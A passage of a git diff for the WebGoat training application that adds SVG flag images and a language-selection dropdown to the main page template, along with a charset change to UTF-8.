+  <path fill="none" stroke="#000" stroke-width=".4" d="M213.7 180.4c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M217.4 179.8c0-.6.5-1.1 1.1-1.1a1 1 0 0 1 1.1 1c0 .7-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M217.4 179.8c0-.6.5-1.1 1.1-1.1a1 1 0 0 1 1.1 1c0 .7-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M220.9 179.6c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M220.9 179.6c0-.6.5-1 1.1-1 .6 0 1.1.4 1.1 1s-.5 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M224.3 179.7c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M224.3 179.7c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M227.8 179.7c0-.6.5-1 1.1-1 .6 0 1.2.4 1.2 1s-.5 1-1.2 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M227.8 179.7c0-.6.5-1 1.1-1 .6 0 1.2.4 1.2 1s-.5 1-1.2 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" stroke="#000" stroke-width=".4" d="M226 182.7c0-.6.6-1.1 1.2-1.1s1.1.5 1.1 1c0 .6-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.1-1m-.7 3.2c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1c-.6 0-1.1-.4-1.1-1m-.2 3.3c0-.6.5-1 1.2-1 .6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1m1 3c0-.6.6-1.1 1.2-1.1a1 1 0 0 1 1.1 1c0 .7-.5 1.1-1.1 1.1a1.1 1.1 0 0 1-1.1-1m1.9 2.7c0-.6.5-1 1-1 .7 0 1.2.4 1.2 1s-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="#fff" d="M230.4 177.6c0-.5.5-1 1.1-1 .7 0 1.2.4 1.2 1s-.5 1.1-1.2 1.1a1.1 1.1 0 0 1-1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M230.4 177.6c0-.5.5-1 1.1-1 .7 0 1.2.4 1.2 1s-.5 1.1-1.2 1.1a1.1 1.1 0 0 1-1-1z"/>
+  <path fill="#fff" d="M233.5 176c0-.7.5-1.1 1.1-1.1.6 0 1.1.4 1.1 1s-.5 1.1-1 1.1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M233.5 176c0-.7.5-1.1 1.1-1.1.6 0 1.1.4 1.1 1s-.5 1.1-1 1.1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M236.9 175c0-.7.5-1.1 1-1.1s1.2.4 1.2 1-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M236.9 175c0-.7.5-1.1 1-1.1s1.2.4 1.2 1-.5 1-1.1 1a1.1 1.1 0 0 1-1.1-1z"/>
+  <path fill="#fff" d="M240.4 174.3c0-.6.5-1 1.1-1a1 1 0 0 1 1.1 1c0 .6-.5 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M240.4 174.3c0-.6.5-1 1.1-1a1 1 0 0 1 1.1 1c0 .6-.5 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M243.8 174.4c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1 1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M243.8 174.4c0-.6.5-1 1.2-1a1 1 0 0 1 1 1c0 .6-.4 1-1 1a1 1 0 0 1-1.2-1z"/>
+  <path fill="#fff" d="M247.4 175c0-.6.5-1 1.1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.2 1a1.1 1.1 0 0 1-1-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M247.4 175c0-.6.5-1 1.1-1a1 1 0 0 1 1.2 1c0 .6-.5 1-1.2 1a1.1 1.1 0 0 1-1-1z"/>
+  <path fill="#fff" d="M250.7 176.1c0-.6.5-1 1.2-1 .6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1"/>
+  <path fill="none" stroke="#000" stroke-width=".4" d="M250.7 176.1c0-.6.5-1 1.2-1 .6 0 1 .4 1 1s-.4 1-1 1a1.1 1.1 0 0 1-1.2-1z"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".5" d="M222.3 244.1h-1v-1h-1.6v3.9h1.6v2.6h-3.5v7.5h1.9v15.2h-3.8v7.8h29v-7.8h-3.7v-15.2h1.9v-7.5h-3.6V247h1.7v-3.8h-1.7v1h-1v-1H237v1h-1.2v-1h-1.6v3.8h1.6v2.6h-3.5v-8.3h1.9v-3.8h-1.9v1h-1v-1h-1.6v1h-1v-1h-1.9v3.8h2v8.3H225V247h1.7v-3.8H225v1h-1v-1h-1.8v1zm-6.4 36h29m-29-1.9h29m-29-1.9h29m-29-1.9h29m-29-2.1h29m-25.2-1.7h21.5m-21.5-1.9h21.5m-21.5-2h21.5m-21.5-2h21.5m-21.5-1.9h21.5m-21.5-1.9h21.5m-21.5-1.9h21.5m-23.4-1.9H243m-25.3-1.8H243m-25.3-2H243m-25.3-1.8H243m-21.8-2h18.2m-10.9-1.8h3.6m-3.5-2h3.5m-3.5-1.8h3.5m-3.5-1.9h3.5m-5.4-2.4h7.3m-12.8 8h3.8m-5.4-2.3h7m-7 34.8v-1.9m0-1.9v-1.9m-2 2v1.8m3.6 0v-1.9m2 3.8v-1.9m0-1.9v-1.9m0-2.1v-1.7m0-1.9v-2m-2 7.7v-2.1m-3.5 2.1v-2.1m7.3 0v2.1m1.7-2.1v-1.7m-5.5-1.9v2m3.8-2v2m3.5-2v2m-1.8-2v-2m1.8-2v2m0-5.8v2m-1.8-3.9v2m1.8-3.8v1.8m-3.5-1.9v2m-3.8-2v2m-1.6-3.8v1.9m3.5-2v2m3.6-2v2m1.9-3.8v1.9m-3.6-2v2m-3.8-2v2m-1.6-3.8v1.9m7-2v2m-3.5-5.7v1.9m16.3-2h-3.7m5.4-2.3H234m7 34.8v-1.9m0-1.9v-1.9m2 2v1.8m-3.6 0v-1.9m-1.9 3.8v-1.9m0-1.9v-1.9m0-2.1v-1.7m0-1.9v-2m2 7.7v-2.1m3.5 2.1v-2.1m-7.3 0v2.1m-1.7-2.1v-1.7m5.4-1.9v2m-3.7-2v2m-3.6-2v2m1.9-2v-2m-1.9-2v2m0-5.8v2m1.9-3.9v2m-1.9-3.8v1.8m3.6-1.9v2m3.8-2v2m1.6-3.8v1.9m-3.5-2v2m-3.6-2v2m-1.9-3.8v1.9m3.6-2v2m3.7-2v2m1.7-3.8v1.9m-7.1-2v2m3.6-5.7v1.9m-7.4 19.1v-2m0-5.8V259m0 5.7v-1.9m0-5.7v-1.8m0-2v-1.8m0-3.8v-2m0-1.8V242m-9 5h3.8m3.6-5.7h3.5m3.6 5.7h3.7"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".5" d="M235.3 280.1v-5c0-1-.5-3.8-5-3.8-4.3 0-4.7 2.9-4.7 3.8v5h9.7z"/>
+  <path fill="#c8b100" stroke="#000" stroke-width=".5" d="m227.2 275.4-2.3-.3c0-1 .2-2.3 1-2.8l2 1.7c-.2.2-.7.9-.7 1.4zm6.4 0 2.4-.3c0-1-.3-2.3-1-2.8l-2 1.7c.1.2.6.9.6 1.4zm-2.4-2.4 1.2-2.1a5.6 5.6 0 0 0-2-.5c-.6 0-1.5.2-2 .5l1.2 2.1h1.6zm-4.4-6v-5c0-1.4-1-2.6-2.6-2.6-1.7 0-2.6 1.2-2.6 2.6v5.2h5.2zm7.3 0v-5c0-1.4 1-2.6 2.6-2.6s2.6 1.2 2.6 2.6v5.2h-5.2zm-1.9-12.7.5-4.7h-4.5l.2 4.7h3.8zm3.5 0-.4-4.7h4.7l-.5 4.7h-3.8zm-10.6 0 .2-4.7h-4.5l.5 4.7h3.8z"/>
+  <path fill="#0039f0" d="M233.6 280.1v-4.3c0-.7-.4-2.8-3.3-2.8a2.9 2.9 0 0 0-3 2.8v4.3h6.3zm-7.3-13.5v-4.5c0-1.2-.7-2.4-2.1-2.4s-2.2 1.2-2.2 2.4v4.5h4.3zm8.3 0v-4.5c0-1.2.7-2.4 2.1-2.4s2.1 1.2 2.1 2.4v4.5h-4.2z"/>
+  <path fill="#ad1519" d="M239.5 287.8c0-10.4 7.5-18.8 16.6-18.8s16.7 8.4 16.7 18.7c0 10.4-7.5 18.8-16.7 18.8s-16.6-8.4-16.6-18.7"/>
+  <path fill="none" stroke="#000" stroke-width=".6" d="M239.5 287.8c0-10.4 7.5-18.8 16.6-18.8s16.7 8.4 16.7 18.7c0 10.4-7.5 18.8-16.7 18.8s-16.6-8.4-16.6-18.7z"/>
+  <path fill="#005bbf" d="M244.4 287.7c0-7.6 5.3-13.7 11.7-13.7 6.5 0 11.8 6.1 11.8 13.7s-5.3 13.7-11.7 13.7c-6.5 0-11.8-6.1-11.8-13.7"/>
+  <path fill="none" stroke="#000" stroke-width=".6" d="M244.4 287.7c0-7.6 5.3-13.7 11.7-13.7 6.5 0 11.8 6.1 11.8 13.7s-5.3 13.7-11.7 13.7c-6.5 0-11.8-6.1-11.8-13.7z"/>
+  <path fill="#c8b100" d="M250.6 278.3s-1.4 1.5-1.4 2.9.6 2.6.6 2.6a1.5 1.5 0 0 0-1.4-1 1.5 1.5 0 0 0-1.6 1.5l.3.8.5 1c.2-.4.5-.6 1-.6.6 0 1 .5 1 1v.3h-1.2v1h1.1l-.8 1.7 1-.4 1 1 .8-1 1 .4-.7-1.6h1v-1.1h-1.2a1 1 0 0 1 0-.3c0-.5.5-1 1-1s1 .2 1 .6l.6-1 .2-.8c0-.8-.6-1.5-1.5-1.5-.7 0-1.2.4-1.4 1 0 0 .5-1.2.5-2.6 0-1.4-1.4-3-1.4-3"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="M250.6 278.3s-1.4 1.5-1.4 2.9.6 2.6.6 2.6a1.5 1.5 0 0 0-1.4-1 1.5 1.5 0 0 0-1.6 1.5l.3.8.5 1c.2-.4.5-.6 1-.6.6 0 1 .5 1 1v.3h-1.2v1h1.1l-.8 1.7 1-.4 1 1 .8-1 1 .4-.7-1.6h1v-1.1h-1.2a1 1 0 0 1 0-.3c0-.5.5-1 1-1s1 .2 1 .6l.6-1 .2-.8c0-.8-.6-1.5-1.5-1.5-.7 0-1.2.4-1.4 1 0 0 .5-1.2.5-2.6 0-1.4-1.4-3-1.4-3z"/>
+  <path fill="#c8b100" d="M248.4 287.9h4.5v-1.1h-4.5v1z"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M248.4 287.9h4.5v-1.1h-4.5v1z"/>
+  <path fill="#c8b100" d="M261.5 278.3s-1.4 1.5-1.4 2.9.6 2.6.6 2.6c-.2-.6-.8-1-1.4-1-.9 0-1.6.7-1.6 1.5l.3.8.5 1c.1-.4.5-.6 1-.6a1 1 0 0 1 1 1 1 1 0 0 1 0 .3h-1.2v1h1.1l-.8 1.7 1-.4.9 1 .9-1 1 .4-.8-1.6h1.1v-1.1h-1.2a.9.9 0 0 1 0-.3c0-.5.5-1 1-1s.9.2 1 .6l.6-1 .2-.8c0-.8-.7-1.5-1.5-1.5-.7 0-1.3.4-1.5 1 0 0 .6-1.2.6-2.6 0-1.4-1.4-3-1.4-3"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="M261.5 278.3s-1.4 1.5-1.4 2.9.6 2.6.6 2.6c-.2-.6-.8-1-1.4-1-.9 0-1.6.7-1.6 1.5l.3.8.5 1c.1-.4.5-.6 1-.6a1 1 0 0 1 1 1 1 1 0 0 1 0 .3h-1.2v1h1.1l-.8 1.7 1-.4.9 1 .9-1 1 .4-.8-1.6h1.1v-1.1h-1.2a.9.9 0 0 1 0-.3c0-.5.5-1 1-1s.9.2 1 .6l.6-1 .2-.8c0-.8-.7-1.5-1.5-1.5-.7 0-1.3.4-1.5 1 0 0 .6-1.2.6-2.6 0-1.4-1.4-3-1.4-3z"/>
+  <path fill="#c8b100" d="M259.3 287.9h4.5v-1.1h-4.5v1z"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M259.3 287.9h4.5v-1.1h-4.5v1z"/>
+  <path fill="#c8b100" d="M256 287.6s-1.3 1.5-1.3 3c0 1.4.6 2.6.6 2.6a1.5 1.5 0 0 0-1.5-1 1.5 1.5 0 0 0-1.5 1.4l.2.8.5 1c.2-.3.6-.5 1-.5.6 0 1.1.4 1.1 1a1 1 0 0 1 0 .3h-1.2v1h1l-.8 1.7 1.1-.5.9 1 .8-1 1.1.5-.8-1.7h1.1v-1h-1.2a1 1 0 0 1 0-.3c0-.6.4-1 1-1 .5 0 .9.2 1 .5l.5-1c.1-.2.3-.5.3-.8 0-.8-.7-1.4-1.6-1.4a1.5 1.5 0 0 0-1.4 1s.6-1.2.6-2.7c0-1.4-1.4-2.9-1.4-2.9"/>
+  <path fill="none" stroke="#000" stroke-linejoin="round" stroke-width=".3" d="M256 287.6s-1.3 1.5-1.3 3c0 1.4.6 2.6.6 2.6a1.5 1.5 0 0 0-1.5-1 1.5 1.5 0 0 0-1.5 1.4l.2.8.5 1c.2-.3.6-.5 1-.5.6 0 1.1.4 1.1 1a1 1 0 0 1 0 .3h-1.2v1h1l-.8 1.7 1.1-.5.9 1 .8-1 1.1.5-.8-1.7h1.1v-1h-1.2a1 1 0 0 1 0-.3c0-.6.4-1 1-1 .5 0 .9.2 1 .5l.5-1c.1-.2.3-.5.3-.8 0-.8-.7-1.4-1.6-1.4a1.5 1.5 0 0 0-1.4 1s.6-1.2.6-2.7c0-1.4-1.4-2.9-1.4-2.9z"/>
+  <path fill="#c8b100" d="M253.8 297.2h4.5v-1h-4.5v1z"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M253.8 297.2h4.5v-1h-4.5v1z"/>
+  <path fill="#c8b100" d="M289.4 238.3h-.3a1.6 1.6 0 0 1-.3.4c-.3.2-.7.3-.9 0a.5.5 0 0 1-.1-.4.5.5 0 0 1-.5 0c-.3-.1-.4-.5-.2-.8l.1-.2v-.3h-.3l-.1.3c-.3.2-.6.3-.8.1a.6.6 0 0 1-.1-.2h-.2c-.5.2-.7-1-.8-1.3l-.1.3v1.3a7 7 0 0 1-.3 1.2c.8.2 2 .8 3 1.7a9.6 9.6 0 0 1 2.5 2.5l1.2-.6c.6-.2 1.4-.2 1.4-.2l.2-.2c-.3 0-1.6.1-1.6-.4l.1-.2a.7.7 0 0 1-.3 0c-.2-.2-.2-.5 0-.8h.2v-.4h-.3l-.2.1c-.3.3-.7.3-.9 0a.5.5 0 0 1 0-.4.6.6 0 0 1-.6 0 .6.6 0 0 1 0-.9 1.6 1.6 0 0 1 .2-.3v-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M289.4 238.3h-.3a1.6 1.6 0 0 1-.3.4c-.3.2-.7.3-.9 0a.5.5 0 0 1-.1-.4.5.5 0 0 1-.5 0c-.3-.1-.4-.5-.2-.8l.1-.2v-.3h-.3l-.1.3c-.3.2-.6.3-.8.1a.6.6 0 0 1-.1-.2h-.2c-.5.2-.7-1-.8-1.3l-.1.3v1.3a7 7 0 0 1-.3 1.2c.8.2 2 .8 3 1.7a9.6 9.6 0 0 1 2.5 2.5l1.2-.6c.6-.2 1.4-.2 1.4-.2l.2-.2c-.3 0-1.6.1-1.6-.4l.1-.2a.7.7 0 0 1-.3 0c-.2-.2-.2-.5 0-.8h.2v-.4h-.3l-.2.1c-.3.3-.7.3-.9 0a.5.5 0 0 1 0-.4.6.6 0 0 1-.6 0 .6.6 0 0 1 0-.9 1.6 1.6 0 0 1 .2-.3v-.3z"/>
+  <path d="M287 239h.3s.1.2 0 .2h-.2v-.2"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M287 239h.3s.1.2 0 .2h-.2v-.2z"/>
+  <path d="m288 239.8-.3-.2v-.2h.2l.3.3.3.2s.1.1 0 .2h-.1l-.4-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="m288 239.8-.3-.2v-.2h.2l.3.3.3.2s.1.1 0 .2h-.1l-.4-.3"/>
+  <path d="m286.3 238.6-.3-.2s-.1 0 0-.1h.1l.3.1.2.2.1.1h-.2l-.2-.1"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="m286.3 238.6-.3-.2s-.1 0 0-.1h.1l.3.1.2.2.1.1h-.2l-.2-.1"/>
+  <path d="M285.2 237.9h.2l.1.2h-.2l-.1-.2"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M285.2 237.9h.2l.1.2h-.2l-.1-.2z"/>
+  <path d="M289.1 240.6v-.3h-.3v.3h.3"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M289.1 240.6v-.3h-.3v.3h.3z"/>
+  <path d="m289.7 241.2.2.2c0 .1.2.1.2 0l-.2-.3-.2-.2h-.2v.1l.2.2"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="m289.7 241.2.2.2c0 .1.2.1.2 0l-.2-.3-.2-.2h-.2v.1l.2.2"/>
+  <path d="M290.7 242v-.2h-.3v.3h.3"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M290.7 242v-.2h-.3v.3h.3z"/>
+  <path fill="#c8b100" d="M287.9 235.9h-.6l-.2.9.1.1h.2l.7-.5-.2-.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M287.9 235.9h-.6l-.2.9.1.1h.2l.7-.5-.2-.5"/>
+  <path fill="#c8b100" d="M286.2 236.4v.5l1 .2v-.3l-.5-.7-.5.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M286.2 236.4v.5l1 .2v-.3l-.5-.7-.5.3"/>
+  <path fill="#c8b100" d="m288.2 237.5-.5.3-.6-.8v-.1h1.1v.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m288.2 237.5-.5.3-.6-.8v-.1h1.1v.6"/>
+  <path fill="#c8b100" d="M287 236.8a.3.3 0 0 1 .3-.1.3.3 0 0 1 .1.4.3.3 0 0 1-.3 0 .3.3 0 0 1-.2-.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M287 236.8a.3.3 0 0 1 .3-.1.3.3 0 0 1 .1.4.3.3 0 0 1-.3 0 .3.3 0 0 1-.2-.3z"/>
+  <path fill="#c8b100" d="m284.8 235.9-.3-.8a2 2 0 0 0-.4-.4s.4-.2.9.1c.4.3 0 .9 0 .9l-.2.2"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m284.8 235.9-.3-.8a2 2 0 0 0-.4-.4s.4-.2.9.1c.4.3 0 .9 0 .9l-.2.2z"/>
+  <path fill="#c8b100" d="m285.8 236.2-.4.4-.7-.6v-.3h1l.1.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m285.8 236.2-.4.4-.7-.6v-.3h1l.1.5"/>
+  <path fill="#c8b100" d="m284.6 235.8.3-.2c.1 0 .2.2.1.3 0 .2-.2.3-.3.3 0 0-.1-.2 0-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m284.6 235.8.3-.2c.1 0 .2.2.1.3 0 .2-.2.3-.3.3 0 0-.1-.2 0-.4z"/>
+  <path fill="#c8b100" d="M290.2 237.3h-.6l-.3.8v.2h.2l.9-.4-.2-.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M290.2 237.3h-.6l-.3.8v.2h.2l.9-.4-.2-.6"/>
+  <path fill="#c8b100" d="m288.5 237.6-.1.6.9.2h.1v-.2l-.4-.8-.5.2"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m288.5 237.6-.1.6.9.2h.1v-.2l-.4-.8-.5.2"/>
+  <path fill="#c8b100" d="m290.3 239-.6.2-.4-.8v-.2h.1l1 .2-.1.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m290.3 239-.6.2-.4-.8v-.2h.1l1 .2-.1.6"/>
+  <path fill="#c8b100" d="M289.1 238.1c.1-.1.3-.1.4 0a.3.3 0 0 1 .1.4.3.3 0 0 1-.4 0 .3.3 0 0 1 0-.4"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M289.1 238.1c.1-.1.3-.1.4 0a.3.3 0 0 1 .1.4.3.3 0 0 1-.4 0 .3.3 0 0 1 0-.4z"/>
+  <path fill="#c8b100" d="m292.2 239.2.1.6-.9.3h-.1v-.2l.3-.8.6.1"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m292.2 239.2.1.6-.9.3h-.1v-.2l.3-.8.6.1"/>
+  <path fill="#c8b100" d="m292 240.8-.5.2-.3-.9v-.1h.2l.8.3-.1.5"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m292 240.8-.5.2-.3-.9v-.1h.2l.8.3-.1.5"/>
+  <path fill="#c8b100" d="m290.5 239.3-.2.5.9.3h.1v-.1l-.2-.9-.6.2"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m290.5 239.3-.2.5.9.3h.1v-.1l-.2-.9-.6.2"/>
+  <path fill="#c8b100" d="M291.5 240.3a.3.3 0 0 0 0-.4.3.3 0 0 0-.5 0 .3.3 0 0 0 0 .3.3.3 0 0 0 .4 0"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M291.5 240.3a.3.3 0 0 0 0-.4.3.3 0 0 0-.5 0 .3.3 0 0 0 0 .3.3.3 0 0 0 .4 0z"/>
+  <path fill="#c8b100" d="m292.9 242.1.8.1a2 2 0 0 1 .5.3s.1-.5-.3-.8c-.4-.3-.9.2-.9.2l-.1.2"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m292.9 242.1.8.1a2 2 0 0 1 .5.3s.1-.5-.3-.8c-.4-.3-.9.2-.9.2l-.1.2z"/>
+  <path fill="#c8b100" d="m292.3 241.2-.3.5.8.5v-.1h.2l-.1-1h-.6"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="m292.3 241.2-.3.5.8.5v-.1h.2l-.1-1h-.6"/>
+  <path fill="#c8b100" d="M293 242.2s.2-.2.1-.3h-.4c-.1 0-.2.2-.1.3h.3"/>
+  <path fill="none" stroke="#000" stroke-width=".3" d="M293 242.2s.2-.2.1-.3h-.4c-.1 0-.2.2-.1.3h.3zm40.7-23.4v.6H331v-.6h1v-1.4h-.7v-.6h.6v-.5h.7v.5h.6v.6h-.6v1.4h1"/>
+  <path fill="none" d="M179.3 231.6v-1.3m-.3 1.3v-1.3m-.3 1.3v-1.3m-.4 1.3v-1.3"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M178 231.6v-1.3m-.5 1.2v-1.2m.2 1.2v-1.2m-.7 1.2v-1.1m.2 1v-1m-.9 1v-1m.2 1v-1m.2 1v-1m-.7 1v-1m-.2.9v-.8m-.2.8v-.8m-.6.8v-.7m.3.7v-.7m-.5.6v-.6m-.2.5v-.4m-.3.3v-.3m-.3.3v-.2"/>
+  <path fill="none" stroke="#000" stroke-width=".2" d="M173.8 231v-.1"/>
+  <path fill="none" d="M180.8 231.5v-1.2m-.7 1.2v-1.2m-.4 1.3v-1.3m152.6 1.3v-1.3m-.3 1.3v-1.3m-.4 1.3v-1.3m-.4 1.3v-1.3"/>
+  <path fill="none" stroke="#000" stroke-width=".1" d="M331 231.6v-1.3m-.6 1.2v-1.1m.3 1.1v-1.2m-.8 1.2v-1.1m.2 1.1v-1.2m-.9 1.1v-1m.2 1v-1m.3 1v-1m-.7 1v-1m-.3 1v-.9m-.2.8v-.8m-.5.8v-.7m.2.7v-.7m-.5.6v-.5m-.2.5v-.5m-.3.4v-.4m-.2.3v-.2"/>
+  <path fill="none" stroke="#000" stroke-width=".2" d="M326.7 231v-.1"/>
+  <path fill="none" d="M333.7 231.5v-1.2m-.6 1.3v-1.3m-.5 1.3v-1.3"/>
+</svg>
diff --git a/src/main/resources/webgoat/static/css/img/frlang.svg b/src/main/resources/webgoat/static/css/img/frlang.svg
new file mode 100644
index 000000000..dfa34e8c9
--- /dev/null
+++ b/src/main/resources/webgoat/static/css/img/frlang.svg
@@ -0,0 +1,7 @@
+<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-fr" viewBox="0 0 512 512">
+  <g fill-rule="evenodd" stroke-width="1pt">
+    <path fill="#fff" d="M0 0h512v512H0z"/>
+    <path fill="#002654" d="M0 0h170.7v512H0z"/>
+    <path fill="#ce1126" d="M341.3 0H512v512H341.3z"/>
+  </g>
+</svg>
diff --git a/src/main/resources/webgoat/static/css/img/nllang.svg b/src/main/resources/webgoat/static/css/img/nllang.svg
new file mode 100644
index 000000000..eb0e360f3
--- /dev/null
+++ b/src/main/resources/webgoat/static/css/img/nllang.svg
@@ -0,0 +1,5 @@
+<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-nl" viewBox="0 0 512 512">
+  <path fill="#21468b" d="M0 0h512v512H0z"/>
+  <path fill="#fff" d="M0 0h512v341.3H0z"/>
+  <path fill="#ae1c28" d="M0 0h512v170.7H0z"/>
+</svg>
diff --git a/src/main/resources/webgoat/templates/main_new.html b/src/main/resources/webgoat/templates/main_new.html
index 4546b7887..92c47fd65 100644
--- a/src/main/resources/webgoat/templates/main_new.html
+++ b/src/main/resources/webgoat/templates/main_new.html
@@ -24,7 +24,7 @@
 
     <!-- Require.js used to load js asynchronously -->
     <script src="js/libs/require.min.js" data-main="js/main"></script>
-    <meta http-equiv="Content-Type" content="text/id; charset=ISO-8859-1"/>
+    <meta http-equiv="Content-Type" content="text/id; charset=UTF-8"/>
     <title>WebGoat</title>
 </head>
 <body>
@@ -40,12 +40,15 @@
 
         </div><!--lesson title end-->
         <div class="user-nav pull-right" id="user-and-info-nav" style="margin-right: 75px;">
+            <!-- webwolf menu item -->
             <a th:href="@{/WebWolf}" target="_blank">
                 <button type="button" id="webwolf-button" class="btn btn-default right_nav_button"
                         title="WebWolf">
                     <img th:src="@{/css/img/wolf.svg}"></img>
                 </button>
             </a>
+            <!-- user menu item -->
+            <div class="btn-group">
             <div class="dropdown" style="display:inline">
                 <button type="button" data-toggle="dropdown" class="btn btn-default dropdown-toggle" id="user-menu">
                     <i class="fa fa-user"></i> <span class="caret"></span>
@@ -68,9 +71,57 @@
                     </li>
                     <li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#">
                         <span th:text="#{build}">Build:</span><span>: </span>
-                        <span th:text="${@environment.getProperty('webgoat.build.number')}"></span></a></li>
+                        <span th:text="${@environment.getProperty('webgoat.build.number')}"></span></a>
+                    </li>
                 </ul>
             </div>
+            </div>
+            <!-- language select menu item -->
+            <!-- free flag images from https://flagicons.lipis.dev -->
+            <div class="btn-group">
+            <div class="dropdown" style="display:inline">
+                <button type="button" data-toggle="dropdown" class="btn btn-default dropdown-toggle" id="lang-button">
+                    <div th:switch="${#locale.language}">
+                        <div th:case="'nl'">
+                            <img th:src="@{${'/css/img/'}+${#locale.language}+${'lang.svg'}}"></img><span class="caret"></span>
+                        </div>
+                        <div th:case="'de'">
+                            <img th:src="@{${'/css/img/'}+${#locale.language}+${'lang.svg'}}"></img><span class="caret"></span>
+                        </div>
+                        <div th:case="'fr'">
+                            <img th:src="@{${'/css/img/'}+${#locale.language}+${'lang.svg'}}"></img><span class="caret"></span>
+                        </div>
+                        <div th:case="*">
+                            <img th:src="@{${'/css/img/enlang.svg'}}"></img><span class="caret"></span>
+                        </div>
+                    </div>
+                </button>
+                <ul class="dropdown-menu dropdown-menu-left">
+                    <li role="presentation">
+                        <a role="menuitem" th:href="@{/start.mvc?lang=en#lesson/WebGoatIntroduction.lesson}">
+                            <img th:src="@{${'/css/img/enlang.svg'}}" alt="English" height="20"></img> English
+                        </a>
+                    </li>
+                    <li role="presentation" class="divider"></li>
+                    <li role="presentation">
+                        <a role="menuitem" th:href="@{/start.mvc?lang=de#lesson/WebGoatIntroduction.lesson}">
+                            <img th:src="@{${'/css/img/delang.svg'}}" alt="Deutsch" height="20"></img> Deutsch
+                        </a>
+                    </li>
+                    <li role="presentation">
+                        <a role="menuitem" th:href="@{/start.mvc?lang=fr#lesson/WebGoatIntroduction.lesson}">
+                            <img th:src="@{${'/css/img/frlang.svg'}}" alt="Français" height="20"></img> Français
+                        </a>
+                    </li>
+                    <li role="presentation">
+                        <a role="menuitem" th:href="@{/start.mvc?lang=nl#lesson/WebGoatIntroduction.lesson}">
+                            <img th:src="@{${'/css/img/nllang.svg'}}" alt="Nederlands" height="20"></img> Nederlands
+                        </a>
+                    </li>
+                </ul>
+            </div>
+            </div>
+            <!-- reportcard menu item -->
             <div style="display:inline" id="settings">
                 <!--<button type="button" id="admin-button" class="btn btn-default right_nav_button" title="Administrator">-->
                 <!--<i class="fa fa-cog"></i>-->
@@ -86,10 +137,12 @@
                 <!--<i class="fa fa-users"></i>-->
                 <!--</button>-->
             </div>
+            <!-- about menu item -->
